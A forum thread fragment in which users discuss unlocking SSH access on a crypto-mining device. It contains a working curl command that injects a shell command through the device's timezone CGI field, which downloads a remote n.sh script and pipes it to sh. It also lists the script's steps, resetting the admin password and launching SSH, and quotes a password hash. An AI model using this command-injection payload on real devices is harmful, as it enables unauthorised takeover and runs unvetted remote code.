Code:
curl 'http://<miner IP>/timezoneconf.cgi' \
-b 'auth=ff0000ff4813494d137e1631bba301d5' \
--data-raw 'timezone=%3Bwget%20http%3A%2F%2Fxn--i29h.ge%2Fn.sh%20-O-%7Csh%3B'
That sounds interesting.
I tried it but got an error 'Not found' from this first curl command.
The one for timezone works.
I switch the password back to root so I'm guessing it's not fetching your link?
I ran that in Linux terminal.
Is your link up and running?
Sorry I'm a real beginner.
For these next steps, are you able to give more details on how to do that?
<
1 - Changes the admin user password to admin. The original password hash is $5$1N6rEpvUXco$0QAASdP5iZRPWxgmAZQkTC0FM8GGw6L7HnprqT7Ll72 which I've not cracked.
2 - Generates a new ED25519 host key.
3 - Creates the jail environment the SSH daemon expects.
4 - Configures SSH as a init service.
5 - Launches the SSH service, so you don't have to reboot.
>
Thanks